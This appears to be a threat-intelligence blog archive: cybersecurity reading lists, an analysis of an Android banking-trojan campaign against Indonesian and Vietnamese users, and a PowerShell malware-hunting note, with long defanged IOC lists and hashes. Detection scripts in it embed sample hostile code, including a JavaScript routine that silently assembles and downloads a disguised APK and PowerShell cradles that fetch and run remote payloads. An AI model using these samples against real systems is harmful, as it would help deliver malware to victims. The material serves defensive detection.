18tiktok-get[.]pro
adac-banklnq-solarlsqroup[.]com
admin-octorate[.]icu
alphazone[.]icu
alveriq[.]run
americanfiscalroots[.]digital
app-degiro[.]life
app-lodgify[.]today
app-mews[.]life
app-tt-eighteenplus[.]pro
arvest-login[.]icu
asflinaq-de[.]com
assurix[.]run
atonovat[.]run
atorishation[.]icu
atotax[.]icu
au-ato[.]com
au-ato[.]info
au-ato[.]org
au-entrance[.]icu
auauth[.]icu
authcu[.]icu
author-glob[.]icu
authtax[.]icu
avaibook[.]today
aviabook[.]icu
balancevector[.]digital
becu[.]life
beginnersguide[.]digital
beytra[.]run
binance-copytrading[.]pro
blueecho[.]icu
bookary[.]digital
brightfoundations[.]run
btexplorer[.]icu
capcat[.]icu
casualabaya[.]icu
center-download[.]pro
center-hubs[.]com
center-upload[.]pro
centerhub[.]pro
chromaguide[.]icu
civiccore[.]digital
clarvexa[.]icu
cleareditlab[.]icu
clearoak[.]icu
cleranta[.]today
cloud-m32s-center[.]pro
cloudmention[.]icu
confirmation-id1174[.]com
confirmation-id1175[.]com
confirmation-id1176[.]com
confirmation-id1177[.]com
coremention[.]icu
corp-ms32-download[.]pro
credenza[.]run
credvoria[.]today
cyberpulse[.]icu
darkvoid[.]icu
datapanel[.]icu
datatransit[.]life
distan[.]icu
dornwell[.]today
dovexa[.]top
download-center-io[.]pro
downloads-center[.]pro
dowloadstake[.]com
drovenor[.]today
droxia[.]top
e-access[.]icu
e-auth[.]icu
economicsinsight[.]icu
econviewpoint[.]digital
eldenhall[.]digital
entcu[.]icu
entsolutions[.]icu
esl-access[.]com
etradeai[.]icu
etradeapi[.]icu
etradelogistic[.]icu
everlynx[.]icu
fidelity-entrance[.]com
fidelity-log[.]com
fidelity-login[.]com
fidellity-online[.]com
financebasics[.]digital
finatracore[.]today
finliteracynetwork[.]world
finlume[.]digital
finolyze[.]digital
finostra[.]digital
finovexa[.]digital
firmara[.]today
first-access[.]icu
fleetfedx[.]com
flexiraq[.]world
flrstrade[.]com
fnbo-access[.]icu
focusinsights[.]pro
focusonsystems[.]run
freyqa[.]bet
g-entrance[.]icu
get-centerapp[.]pro
get-tt-plus-download[.]com
get-upload[.]pro
getdownload-hub[.]com
getdownload-mscenter[.]com
getdownloadhub[.]com
gettaxato[.]icu
getupload-center[.]live
getupload[.]pro
getveridian[.]icu
glaviso[.]top
gov-access[.]icu
govaccess[.]icu
greythorpe[.]world
gridpattern[.]life
grotexor[.]icu
holven[.]icu
hostvista[.]digital
huntington-acc[.]com
huntington-access[.]com
huntington-access[.]icu
huntington-entrance[.]com
huntington-entrance[.]icu
huntington-log[.]com
huntington-online[.]com
huntington-read[.]com
id-centraldispatch[.]life
id-mexem[.]life
id-onpoint[.]life
id-tradestation[.]life
inforelic[.]icu
interactvebroker[.]com
keldra[.]top
kenvia[.]today
Cybersecurity Reading List - Week of 2025-09-29

Commentary followed by links to cybersecurity articles that caught our interest internally.

The days are getting shorter, and so is the news cycle. 

It’s A Lot. 

Bright spots emerge from the pattern, and one of the brightest in a while occurred last week for me - LABScon. SentinelOne and various sponsors manage to gather nearly two hundred of the top cybersecurity folks every year to talk and listen to each other, and I was honored to be admitted this year. The agenda itself is public and tells you enough to know just what kind of impact speakers can have: human rights investigators, harassment fighters, nation-state espionage mitigators, and more. 

While a lot of it was TLP:RED, one thing I’m confident in sharing is the week showed me a community of folks intent and determined on doing good for the world. Many are positioned to follow through on that in some way and are excited to talk about it to a full room or one-on-one with a complete stranger. 

It’s a posture I’m trying hard to carry back from con and out into the world.

On another note, something I’m seeing more of that I want to flag for folks: RecordedFuture published a great report on Stark Industries workarounds to deal with EU sanctions, and Brian Krebs expanded upon it with a great post as well. 

One of the common themes in conversation alongside harder research lately has been the intermediate and long-term ineffectiveness of many of our interventions targeting malicious actors, groups, and campaigns. Takedowns are momentarily gratifying - as I’ve said before, we need to celebrate the wins where we can - but do not seem to provide longitudinal benefits. What does effective long term disruption look like, and is it feasible? What are the models, and what are the realities?

For my part, I’ve been looking at bad actors’ activities before and after US OFAC and UK OFSI sanctions to understand both preparation and reaction. Emerging from technical observables like DNS and BGP is an opaque but solid understanding that bad actors are much better at reliability engineering and disaster recovery than we want to admit, from domain mirroring all the way up to anticipatory Autonomous System takeover. I’ve submitted a talk to CYBERWARCON on the topic (and hopefully it’s accepted!), but if folks reading this know of work around long-term disruption, cybersecurity-related sanctions research, or adjacent topics, I’d love to hear from you. Please shoot me an email at CSRL at domaintools[.]com. 

Podcasts

Microsoft Threat Intelligence - Stopping Domain Impersonation with AI - I know, I know, I’m tired of AI all the time too. But it’s timely and important to stay on top of. Good conversation, especially around how the problem is one of scale rather than sophistication.

Three Buddy Problem - I can’t choose between them, so you get all three Live from LABScon episodes. 

Articles

The Record - Ransomware gang takedowns causing explosion of new, smaller groups - Immediately thought of research we conducted with Analyst1 and Scylla Intel and presented at SLEUTHCON earlier this year. Of particular interest is the finding that disruption tends to result in smaller groups reconstituting around critical trust relationships. 

Infoblox - Deniability by Design: DNS-Driven Insights into a Malicious Ad Network - Incredibly good work by Infoblox weaving deep technical details and deep narrative into a systematic understanding of not just malicious adtech but the behavior behind it and thorough methods to fingerprint and track it. 

Morningstar - Unit 221B Raises $5M in Seed Funding To Convert Threat Intelligence into Real World Arrests - You love to see it. Congratulations to our friends at Unit 221B, who should have people throwing large piles of cash at them all the time, given how excellent their work is. 

Google TIG - Another BRICKSTORM: Stealthy Backdoor Enabling Espionage into Tech and Legal Sectors - Targeting profile prioritized “legal services, Software as a Service (SaaS) providers, Business Process Outsourcers (BPOs), and Technology.” Excellent writeup by TIG, as always.

Schneier - Surveying the Global Spyware Market - Schneier highlights two important points: that investment in spyware companies has risen lately, and the role of brokers and resellers that often go unnoticed in the chain. 

Koi Security - First Malicious MCP in the Wild - Thousands of downloads a week and it’s copying every email to the dev’s personal server. Because the S in MCP stands for Security!

CSO - Why domain-based attacks will continue to wreak havoc - These attacks were dangerous, including at scale, long before AI, but this is a pretty good review of some domain attacks to take note of and to work into your defenses and simulations.

Group-IB - Mapping the Infrastructure and Malware Ecosystem of MuddyWater - Not always the biggest fan of Group-IB, but indicators are indicators, and there’s some good work here about how MuddyWater’s tradecraft is evolving.

Microsoft - Microsoft seizes 338 websites to disrupt rapidly growing ‘RaccoonO365’ phishing service - Joint work between Microsoft DCU and Health-ISAC, highlighting the role RaccoonO365 has adopted in targeting the healthcare sector.

Research Papers and Reports

arXiv - Large Language Models for Security Operations Centers: A Comprehensive Survey - Not ground-breaking, but some valuable LLM/SOC fundamentals covered here.

Entertainment

GadgetReview - Massive Attack Turns Concert Into Facial Recognition Surveillance Experiment - Massive Attack hasn’t commented on data retention from the event, laying bare the ambiguity and lack of agency that goes unseen in all the other applications. A+

Banker Trojan Targeting Indonesian and Vietnamese Android Users

Since approximately August 2024, a group has been targeting Indonesian and Vietnamese Android users with banking trojans disguised as legitimate payment and government identity applications. The operators exhibit distinct domain registration patterns, often reusing TLS certificates and grouping domains to resolve to the same IP addresses, with a strong operational focus during Eastern Asia's daytime hours.

Details

The pattern was initially identified by monitoring for suspicious page elements associated with the Google Play Store, for example the Shodan query http.html:"VfPpkd-jY41G-V67aGc", which can surface spoofed Play Store pages used for malware delivery. 

icrossingappxyz[.]com

The page contains fake Google Play Store and App Store download buttons. Clicking the Google Play button starts an on-page download progress bar and then prompts for a download location on the device. The App Store link was nonfunctional.

The site wraps the Socket.IO library, which enables real-time, bidirectional communication with a server, in an obfuscation layer. This is highly abnormal for a download page. Instead of linking directly to a file, clicking the Android button opens a WebSocket connection and sends socket.emit('startDownload', ...). The server responds by streaming the .apk back to the browser in many small chunks, which the page collects with socket.on('chunk', (chunk) => { chunks.push(chunk); }). Alongside the data the server sends downloadProgress messages, which the script uses to advance the on-screen progress bar so the user believes a normal download is occurring. On the downloadComplete message the script combines all the chunks in memory into a Blob typed 'application/vnd.android.package-archive' (the MIME type for an APK), creates a temporary local URL for it, builds an invisible <a> element pointing at that URL, and programmatically clicks it. Only at that point does the browser show its download prompt. 

The malicious site operators likely attempted to evade detection and hide their malware store through the elaborate download method. Network security and firewalls might be configured to block direct downloads of .apk files. However, by hiding the file transfer inside WebSocket traffic, it can often slip through undetected. Since there is no static URL pointing to the malicious file, automated security scanners that crawl websites looking for malicious links will not find it.
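The delivery flow above is easy to miss with a link crawler and easy to spot with a few behavioral signatures. The following Python is an added example, not code from the original post: it scans page source for the Socket.IO chunk-assembly pattern just described and, for comparison, for the static .apk links a conventional scanner relies on. The two HTML samples are constructed, and the indicator names, the regexes and the rule that three core indicators must co-occur are assumptions.

```python
"""Static heuristics for WebSocket-chunked APK delivery pages.

Added example, not code from the original post. The two HTML samples below
are constructed for illustration; the indicator names, the regexes and the
"three core indicators" rule are the author's own choices, not something the
campaign's pages expose.
"""
import re
from dataclasses import dataclass, field

APK_MIME = "application/vnd.android.package-archive"

# Each indicator is one step of the delivery flow the post describes: a
# Socket.IO client asks the server to start the download, receives the file
# as chunks, reassembles them into a Blob with the APK MIME type, and
# triggers the browser's save prompt through a synthetic click.
INDICATORS = [
    ("socketio_client", re.compile(r"\bio\s*\(|socket\.io(?:\.min)?\.js", re.I)),
    ("emit_start_download", re.compile(r"\.emit\s*\(\s*['\"]startDownload['\"]", re.I)),
    ("chunk_listener", re.compile(r"\.on\s*\(\s*['\"]chunk['\"]", re.I)),
    ("progress_listener", re.compile(r"\.on\s*\(\s*['\"]downloadProgress['\"]", re.I)),
    ("complete_listener", re.compile(r"\.on\s*\(\s*['\"]downloadComplete['\"]", re.I)),
    ("apk_mime_blob", re.compile(r"new\s+Blob\s*\([^)]*" + re.escape(APK_MIME), re.I | re.S)),
    ("object_url", re.compile(r"URL\.createObjectURL\s*\(", re.I)),
    ("synthetic_click", re.compile(r"\.click\s*\(\s*\)", re.I)),
]
# The only thing a link-crawling scanner would look for.
DIRECT_APK_LINK = re.compile(r"""(?:href|src)\s*=\s*['"]([^'"]+\.apk)['"]""", re.I)
# Indicators that must all be present before calling it WebSocket delivery;
# object URLs and synthetic clicks are common in benign download pages.
CORE = {"socketio_client", "chunk_listener", "apk_mime_blob"}


@dataclass
class Verdict:
    matched: list = field(default_factory=list)
    direct_apk_links: list = field(default_factory=list)

    @property
    def websocket_delivery(self) -> bool:
        return CORE.issubset(self.matched)


def analyse(html: str) -> Verdict:
    """Return which indicators fire and any static .apk links on the page."""
    verdict = Verdict()
    for name, rx in INDICATORS:
        if rx.search(html):
            verdict.matched.append(name)
    verdict.direct_apk_links = DIRECT_APK_LINK.findall(html)
    return verdict


# Constructed sample: a spoofed store page using the chunked transport.
SPOOF_PAGE = """
<script src="/socket.io/socket.io.min.js"></script>
<a id="android" href="#">Install</a>
<script>
const socket = io(); const chunks = [];
document.getElementById('android').onclick = () => socket.emit('startDownload', {app: 'ikd'});
socket.on('chunk', (chunk) => { chunks.push(chunk); });
socket.on('downloadProgress', (pct) => { bar.style.width = pct + '%'; });
socket.on('downloadComplete', () => {
  const blob = new Blob(chunks, {type: 'application/vnd.android.package-archive'});
  const a = document.createElement('a');
  a.href = URL.createObjectURL(blob); a.download = 'IdentitasKependudukanDigital.apk';
  a.style.display = 'none'; document.body.appendChild(a); a.click();
});
</script>
"""
# Constructed sample: the plainer template with a direct download link.
DIRECT_PAGE = '<a class="btn" href="/tax-app/M-Pajak.apk">Download</a>'

if __name__ == "__main__":
    for label, page in (("spoof", SPOOF_PAGE), ("direct", DIRECT_PAGE)):
        v = analyse(page)
        print(label, "websocket_delivery=%s" % v.websocket_delivery, v.matched, v.direct_apk_links)
```

The spoof page yields no static .apk link at all, which is exactly why a crawler that only follows links comes back empty; the behavioral indicators fire instead. Tune the CORE set to taste, but keep the APK MIME type in it: chunked transfers over Socket.IO are legitimate for large media, and it is the APK typing plus reassembly in the browser that makes this a delivery page.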

It is worth noting that some browsers correctly flagged these downloads as suspicious with download warning prompts such as the following:

IdentitasKependudukanDigital.apk

1f9253092c5a2abdb7bc3d93fccad85f23ce5bfde38377c792a242f045afcdb5

The file was detected as BankBot.Remo.1.origin, a previously closed source banking trojan that had its source code leaked on Russian-language forums in 2016. This has resulted in many variants.

Other, much more commonplace malware delivery sites were also used, such as the following spoof of M-Pajak, a tax payment app. It simply spoofs the Google Play Store page and links directly to the malicious file stored on the server. Notably, the HTML mixed Thai, Vietnamese, Portuguese, and Indonesian strings rather than inserting the correct language based on the visitor's Accept-Language header or GeoIP, which suggests template files used by unsophisticated operators. 

twmlwcs[.]cc

Download URL: https[:]//twmlwcs[.]cc/tax-app/M-Pajak.apk

M-Pajak.apk

SHA256 Hash: e9d3f6211d4ebbe0c5c564b234903fbf5a0dd3f531b518e13ef0dcc8bedc4a6d  

The downloaded file is also a loader for BankBot and is configured with the following C2 domains: 

saping.ynhqhu[.]com
aaping.ynhqhu[.]com
admin.congdichvucongdancuquocgia[.]cc
admin.outdoormovietheaters[.]com

Of the more than 100 domains identified in this activity for malware distribution, only a handful of variations of the spoofed delivery content were in use. The sample screenshots show the slight variations, along with the fake human-verification prompts that have become commonplace over the past year. 

The group also has a nice habit of keeping their malware in open web directories such as the following:

Open Index of dgpyynxzb[.]com

BCA.apk 0de69fad50b9e0800ba0120fe2b2f7ebb414e1ae335149a77dae3544b0a46139
BCA mobile-8-5.apk 68fb18d67bb2314ff70a0fb42e05c40463cceb9657c62682179e62809429ad99
BRI-JR (1).apk 9ada0f54f0eaa0349c63759172848fcb1dd123d892ece8d74002f96d6f095a43
BRImo_0320SXZ_1 (1).apk 0d36bb982c7b4d7b309f34653af7f5abe80b1503971d9832d617c5f6b35f362c
D-Bank Pro_0725_UU.apk d47246c9bd4961f692cef6e3d8cdc5aa5f64e16946104cc9c194eb47077fd897
Livin.apk 4eb7a289af4ea7c65c4926e4b5e2c9ec3fb4d0b9cc425f704b7d1634c23a03a9
MyBCA-8-5.apk 680eb952cfff2fb39563abc6321851f4b7e6a8014d09ed2744465bcb192562ce
MY_BCA.apk b847b228ed7993136b390bdd6c4afaadc7a441afabf28524bd236e002cf58d47
OCBCmobileid_02202025AC.apk f7a148d0da5bea32a823b27cf8c45e7532d5e0a964cc4a102fa006ea4ff7e64d
OCBC mobile Indonesia_02272025AC.apk 90aa611b5a258d36220afad46aa52f7496dc11211999ea84e0e7182dc3476aa5
WondrBNI727.apk e433744f2372bc1ef925007f1f2a17509b4a498472d68c671bb8849265c61475

Open Index of ykkadm[.]icu

3fb8add8f3b3f6755c6f427c05cc3acc690yLYUy.apk e29c4a157ac2e1a233f9a59e63cb203fd8eac0595c452d93ed9b72e264dbc8f9
ACBONE01172025U.apk 2386baafae215fee4c27b955dd6786a7d70d32e5d6eff54cfd8a1353d3d1b473 
KienlongBank01172025Ucompatible.apk ec5b55d4829d043ed3998cc90f633fab5d37bcf5476c6b274eeba85b9f5baaa7 
NamABank01162025U.apk 359a032427342b32bcd85a40e0f99496732f03bbce15aa0d8c92a2b9cfd493dc 
SHBmobile_01232025U.apk 14ce035b4bc33458612f3b692e9d9f3304e4eb0455c933452ec49d56549520c4 
VTB1212025.apk 33939f391dab818e6bbda531f64280869adbaafc213c2f4773169f561c88f19f 

indiemusicacademi[.]com

Domain Registration Patterns

Over the past 12 months, the actor was observed using distinct domain registration patterns. This often included the reuse of TLS certificates on two domains and grouping multiple domains to resolve to the same IP addresses. 

  • ISP:
    • Alibaba
    • Scloud
    • CloudFlare
  • IP Country: SG, ID
  • Common Website title and page:
    • Identitas Kependudukan Digital- Apps on Google Play
  • Server Type: nginx
  • Nameserver:
    • share-dns[.]net 
    • cloudflare[.]com
  • SSL Issuer: R10, R11, WE1
  • Registrar:
    • Gname.com Pte. Ltd.

The most prolific registration patterns were the use of Alibaba ISP, Gname Registrar, and share-dns[.]net nameservers. 

Heatmaps showing the domain registration (left) and first seen DNS requests (right) with the time of day (UTC) over the year.

Both heatmaps show a visually similar grouping, and the delta between domain registration and first seen DNS resolution averaged 10.5 hours over the year. This suggests the domains are consistently operationalized soon after registration, though not nearly as rapidly as some more prominent cybercrime groups. 

The time data shows a strong grouping around eastern Asia's daytime hours, as is expected with the likely focus on targeting Indonesian and Vietnamese mobile users. It may also suggest the operators are working during the same times, if not also located in the same region.

Conclusion

The operators employed techniques to bypass network controls that block direct .apk downloads and to keep the malicious files away from static URL-based scanners. Some browsers still correctly flag these downloads as suspicious and warn the user, which serves as a crucial last line of defense. At the same time, several commonplace techniques favored by less sophisticated financially motivated groups, such as spoofing the Google Play Store page, make the delivery sites identifiable. The consistent use of Alibaba hosting, the Gname registrar, and share-dns[.]net nameservers across the operation provides a clear infrastructure footprint. While some spoofed sites, like twmlwcs[.]cc, carry mixed-language template code that points to less sophisticated elements, the campaign as a whole shows a coordinated approach to malware delivery. It is likely financially motivated and suspected of being operated by a group in the same region as its targets.

IOCs

Domains (see them on our Github as well)

asdrjswer678[.]com
asociaciondehotelesdemexico[.]com
bocongan-congdichvucong[.]com
bps-ikd[.]com
bpsikd[.]com
brightter-efg[.]com
brightter-ysl[.]com
capnhat-etvn[.]cc
capnhatdulieu-et[.]com
care-ind[.]cc
chinhphutt[.]com
cong-dich-vu-cong-quoc-gia[.]com
cong-dichvucong[.]com
congdichvu[.]cc
congdichvu[.]vip
congdichvucong-bocongan[.]com
congdichvucong-quocgia-dvc[.]com
congdichvucong-quocgia[.]com
congdichvucong[.]cc
congdichvucongbocongan[.]com
congdichvucongdancuquocgia[.]cc
congdichvucongdancuquocgia[.]com
congdichvucongquocgia[.]com
coring-ind-care[.]cc
coring-ind-care[.]com
cpvn-eta[.]cc
cski-evn[.]cc
dich-vu-cong[.]com
dichvucong-dvc-quocgia[.]cc
dichvucong-qg[.]com
dichvucong-quoc-gia[.]com
dichvucong-quocgia[.]cc
dichvucong-quocgia[.]com
dichvucongquocgia[.]com
dichvuquocgia[.]com
dichvuquocgia[.]org
digital-idn[.]com
dirjenpajak-caring-idn[.]com
dirjenpajak-idn-caring[.]com
djp-idn-pajak[.]cc
djp-mpajak-idn[.]cc
djp-mpajak-idn[.]cyou
djp-mpajak-idn[.]top
djpcare-mpajak-idn[.]cc
djpcare-mpajak-idn[.]com
djpcareloop[.]top
down-loadmpajakidn[.]com
download-djpidn[.]com
download-idnpajak[.]com
downloaddjpidn[.]com
downloadmpajakidn[.]com
downloadmpajakidn[.]vip
downloadpajak[.]cc
dulieu-etvn[.]cc
dvc-chinhphu[.]com
dvc-dichvucong[.]com
dvc-quocgia[.]cc
dvc-quocgia[.]com
dvc-quocgia[.]net
dvc-quocgia[.]org
dvcdichvucong[.]com
dvcqg[.]cc
dvcqg[.]org
dvcqg[.]vip
dvcquocgia[.]com
dvcvn-congdichvucongquocgia[.]cc
dvcvn-dichvucongquoccgla[.]online
dvcvn-dichvucongquocgla[.]online
dvcvn-dichvucongquocglaa[.]online
dvcvn-dichvucongquoocgla[.]online
dvcvn-trungtamdulieu[.]com
dxgjsgw[.]com
e-djp[.]com
e-ikd[.]com
e-pajak[.]cc
etx-dongbodulieu[.]com
evn-ctdl[.]cc
fbpsikd[.]click
hdgjgw[.]com
hosodongbo-etvn[.]cc
hsgjsgw[.]com
i-djp-pajak[.]com
icrossingappxyz[.]com
id-djp-dl[.]com
id-ektp[.]com
id-pemerintah[.]com
idmpajak[.]com
idn-digital[.]com
idn-dirjenpajak-caring[.]cc
idn-dirjenpajak-caring[.]com
idn-pajak-djp[.]cc
idn-pajak-djp[.]top
idngov[.]com
idnpajak[.]com
idnpajakdownload[.]com
iheartusnf6[.]com
ikddigital[.]online
ind-ikddps[.]cc
ind-ikddps[.]online
ind-ikddpzs[.]online
ind-ikddpzz[.]online
indiemusicacademi[.]com
japavest[.]com
japfunds[.]com
jfjygw[.]com
keelvari1[.]cc
m-djp-download[.]com
m-pajak[.]cc
m-pajak[.]vip
mpajak-djp-idn[.]cc
mpajak-djp-idn[.]top
mpajak-djp-idn[.]vip
mpajak-idn-download[.]cc
mpajak[.]cc
onlinedjp[.]com
onlinepajak[.]cc
outshine-byd[.]com
outshine-ryg[.]com
outshine-sem[.]com
pa-jak[.]org
pajakdownload[.]com
pemerimtahx[.]com
pemerintah[.]cc
phatnguoicsgt[.]com
registerktp[.]com
registerktp[.]online
toptraditional[.]com
topunfortunately[.]com
topviolent[.]com
ttcskhdl[.]cc
twmlwcs[.]cc
vietnamchinhphu[.]org
vncirclek[.]com
vndichvucongtructuyen[.]com
ykkadm[.]icu
ynhqhu[.]com

Sha256 Hashes

Cybersecurity Reading List - Week of 2025-08-25

The sun has come for us, in the US. We escaped the desert only to trudge back into summer heat. But all is not lost - some things are looking better, and voluminous research has emerged from Hacker Summer Camp.

And now we enter the belly of the beast.

Summer is in full effect in the United States as many of us return from the surface of the sun, also known as Hacker Summer Camp in Las Vegas (covered in a separate post here). Post-Black Hat and DEF CON also brings an abundance of gifts for practitioners and researchers: the publication of tons of new research. As always, the items linked below aren’t intended as a round-up but rather what caught attention internally, having stood out from the rest. 

The rest of the year looms, but not without hope. 

There are some signs that spending freezes are easing and hiring may be picking up. Even in this heat, that’s cold comfort for those in the middle of the job hunt. It’s never been harder or more filled with frustration, dead ends, and deeper hazards like identity theft or financial scams. If you’re in a position to help, do what you can. 

If you’re still on the hunt, keep pushing, and get through however you can. 

Podcasts

Adversary Universe from Crowdstrike - Live at Black Hat: What’s AI Really Capable Of? - 33min - Good, grounded (but relatively upbeat) perspective on AI capabilities for both defenders and attackers. Also some interesting recent attack campaigns, including one with convincing multi-persona smishing threads (no evidence of AI in the latter, yet). 

CyberWire Research Saturday - Beyond the smoke screen - 22min - Excellent interview with Dr. Renee Burton of Infoblox Threat Intel detailing their extensive work on the VexTrio cybercriminal group. They gave a great Black Hat briefing on this topic, and the interview is similarly compelling in both technical and behavioral aspects.

Prompt||GTFO - Youtube playlists for episodes one, two, three - ~90min each - Fascinating series of “prompt pits” in which mostly infosec practitioners get together to share use cases and experiences with AI, with a strict “no slides” rule, demos only. Not an endorsement of AI, but interesting to see how practitioners are using it, and most views involved are pretty reasonable and experience-driven. 

Articles

Infoblox - VexTrio Origin Story, Unmasked, and Inside the Robot - A three-part investigation highlighting world-class research by Infoblox Threat Intel into the evolution, behavior, and technology of a major adtech-related spam and scam actor. Highly recommended to read all three in order to get a better idea of what you end up looking at in the wild. 

Analyst1 - Ransomware Diaries Volume 7: “I Had to Take the Guilt For Everyone” – The Kaseya Hacker Breaks His Silence - Jon DiMaggio’s DEF CON talk with Jon Fokker gripped a full theater for an hour, and the accompanying blog post is even better. There are few investigators on his level, and even fewer storytellers.

Wunderwuzzi - Claude Code: Data Exfiltration with DNS (CVE-2025-55284) - Okay. So. I’m trying to be less adversarial towards GenAI, really I am. But when you allowlist a bunch of bash commands for your autonomous agent and include DNS lookups, you clear a direct path for a long-known and well-researched data exfiltration and command & control method. And then I have to get all mad and shouty again. 

RiskyBulletin - Hackers sabotage Iranian ships at sea, again - “According to an analysis of the leaked files, the group hacked the company's network, identified all maritime communications terminals in its MySQL database, and then deployed malicious code to each ship's satellite terminal that wiped its disk storage.” 

TechCrunch - North Korean spies posing as remote workers have infiltrated hundreds of companies, says CrowdStrike - What I can’t decide is if the seeming overwhelming success of this campaign is down to good execution on the part of DPRK or the sad, sad state of enterprise security, especially whenever it causes friction in hiring processes.

Cofense - Spain TLD’s Recent Rise to Dominance - Anecdotally I’d been seeing .es show up in my investigations more lately even before reading this, and once the article crossed my desk it made more sense. 

Research Papers and Reports

Greynoise Intelligence - Early Warning Signals: When Attacker Behavior Precedes New Vulnerabilities - Greynoise looked backward and found that in 80% of cases, a spike in attempted attacks on a particular technology presaged a CVE release for that technology within six weeks. Excellent work and findings, worth reading the full report. Also covered by Research Saturday interviewing Greynoise VP of Data Science Bob Rudis (30min). 

RecordedFuture - Cloud Threat Hunting and Defense Landscape - In which Insikt Group lays out five prominent attack vectors threatening cloud environments, including details on common misconfigurations as well as logging and hunting internally.

CAIDA - Hunting in the Dark: Metrics for Early Stage Traffic Discovery - “Using a metric for discoverability, we model the ability of defenders to measure Crackonosh traffic as the malware population decreases, evaluate the strength of various detection methods, and demonstrate how different darkspace sizes affect both the ability to track the malware, but enable emergent behaviors by exploiting attacker mistakes.”

arXiv - Security Challenges in AI Agent Deployment: Insights from a Large Scale Public Competition - Results of wide-scale competitive testing across several dozen agents and models, with an eye to evaluating attack transferability and common vulnerabilities. Some significant findings, including limited correlation between size, robustness, or inference-time, meaning that the “better” and “bigger” models didn’t do better than the bargain basement models. 

Tools and Resources

CSO Online - CISA releases Thorium, an open-source, scalable platform for malware analysis - Curious to see where this goes, relative to NSA’s Ghidra.

Entertaining Reading

Wikipedia - The Berners Street Hoax - “Hook spent six weeks sending between a thousand and four thousand letters to tradespeople and businesses ordering deliveries of their goods and services to 54 Berners Street, Westminster, at various times on 27 November 1810.”

Hunting for Malware Networks

Hunting for new malware delivery infrastructure often entails the identification and tracking of common techniques to deliver various stages of malware. See what our researchers stumbled upon.

Details

Take malware-as-a-service providers, for instance: one commonality across a recent activity cluster was the use of web-hosted PowerShell scripts that reference the next stage of malware to download and execute. 

Multiple clusters of stealer activity were observed through early July using PowerShell scripts as an intermediate stage for malware delivery. Creating multiple stages of delivery reduces the initial risk of exposing all malware and associated infrastructure if it is detected early on in execution. It may also slow down response investigations and analysis. 

Hunting for malicious web-hosted PowerShell scripts can be as simple as a Shodan query such as http.html:"Invoke-WebRequest".

Example Finding:
77.110.118[.]195 resolved the malicious domain alababababa[.]cloud.

The host served a reused web-hosted PowerShell script that retrieves a malicious executable, build.exe, and then starts it as a new process.

Filename: build.exe
Sha256: 7ada4d7dfc00943780cb51ea182c7a221953cdabc394011204ba5cd8e4e8f0d3
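The pivot from the Shodan query to the next stage can be automated once the cradle is parsed. The Python below is an added example, not the post's tooling: it extracts the stage URL, the dropped filename and whether the same script executes it, from three constructed banner bodies (the first follows the finding above, with an invented path; the other two use documentation hosts). The cradle forms it handles are assumptions about what a given script contains; scripts that assemble the URL from variables need a richer parser than these regexes.

```python
"""Parser for web-hosted PowerShell download cradles found via the Shodan query.

Added example, not the post's own tooling. The three banner bodies are
constructed: the first follows the finding in the text (alababababa[.]cloud
serving a script that fetches and starts build.exe) but its path and
parameters are invented, the others use documentation hosts. The cradle
forms handled (Invoke-WebRequest/iwr with -OutFile, WebClient
DownloadFile/DownloadString, Start-Process or & of the dropped file, IEX
of an in-memory string) are common ones, not a complete grammar.
"""
import re
from typing import NamedTuple, Optional


class Cradle(NamedTuple):
    stage_url: str             # where the next stage is fetched from
    dropped_as: Optional[str]  # local path it is written to, None if kept in memory
    executed: bool             # whether the same script also runs it


URL = r"""['"]?(https?://[^'"\s)]+)['"]?"""
IWR = re.compile(r"(?:Invoke-WebRequest|\biwr)\s+(?:-Uri\s+)?" + URL +
                 r".*?-OutFile\s+['\"]?([^'\"\s;]+)", re.I | re.S)
WEBCLIENT = re.compile(r"\.Download(?:File|String)\s*\(\s*" + URL +
                       r"(?:\s*,\s*['\"]?([^'\")\s]+))?", re.I)
START = re.compile(r"(?:Start-Process|\bsaps|&)\s+['\"]?([^'\"\s;]+)", re.I)
IN_MEMORY = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)


def _basename(path: Optional[str]) -> Optional[str]:
    return None if path is None else re.split(r"[\\/]", path)[-1].lower()


def parse_cradle(script: str) -> list:
    """Return one Cradle per download statement in a PowerShell script."""
    launched = {_basename(m.group(1)) for m in START.finditer(script)}
    in_memory = IN_MEMORY.search(script) is not None
    found = []
    for m in IWR.finditer(script):
        url, out = m.group(1), m.group(2)
        found.append(Cradle(url, out, _basename(out) in launched))
    for m in WEBCLIENT.finditer(script):
        url, out = m.group(1), m.group(2)
        found.append(Cradle(url, out, _basename(out) in launched if out else in_memory))
    return found


# Constructed banner bodies.
SAMPLE_DROP_AND_RUN = r'''Invoke-WebRequest -Uri "https://alababababa[.]cloud/dl/build.exe" -OutFile "$env:TEMP\build.exe"
Start-Process "$env:TEMP\build.exe"'''
SAMPLE_IN_MEMORY = r"""IEX (New-Object Net.WebClient).DownloadString('http://stage.example/loader.ps1')"""
SAMPLE_BENIGN = r"""iwr https://example.org/README.md -OutFile readme.md"""

if __name__ == "__main__":
    for body in (SAMPLE_DROP_AND_RUN, SAMPLE_IN_MEMORY, SAMPLE_BENIGN):
        for cradle in parse_cradle(body):
            print(cradle)
```

The extracted stage URLs are what feed the next pivot: hash the fetched file, look up its C2 relationships, then expand on the registration overlaps of whatever hosts the cradle, exactly the sequence followed for alababababa[.]cloud below.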

The executable acts as a trojan and connects to the commonly used C2 domain anodes[.]pro, which has communicated with more than 60 malicious files in the past two months, including multiple stealer families (Amadey, Lumma, Luca, DeerStealer, and RedLine) as well as Rugmi, BlackBasta, and DarkGate.

Expanding on the domain behavior in VirusTotal, one additional DeerStealer sample was identified, which also used the same C2 domain. 

Sha256: bd269a6328de0e534f4d8c3a42ea88a4343168053f63da0da95318f4ed17e705

Expanding on the associated infrastructure of the identified intermediary domain “alababababa[.]cloud” through domain registration overlaps identified potentially related activity.

  • NameServer: cloudflare[.]com
  • IP ISP: CloudFlare Inc
  • Address: compliance_abuse[@]webnic[.]cc
  • Registrar: WebNIC
  • SSL Issuer: WE1
alababababa[.]cloud
hugevcdn[.]pro
anodes[.]pro
servicesmesh[.]pro
interconstructionsite[.]pro
zurichinsurince[.]com
zhuchengsantian[.]com

Repeating the previous steps identifies additional malware with commonalities in stealer and C2 usage, such as an Amadey sample observed with the domain hugevcdn[.]pro.

Sha256: 02c158c63d28fd5be24424e41b70a7a361c9be8897590c0453b0d30bd6e0d842
C2: 185.156.72[.]96/te4h2nus/index.php

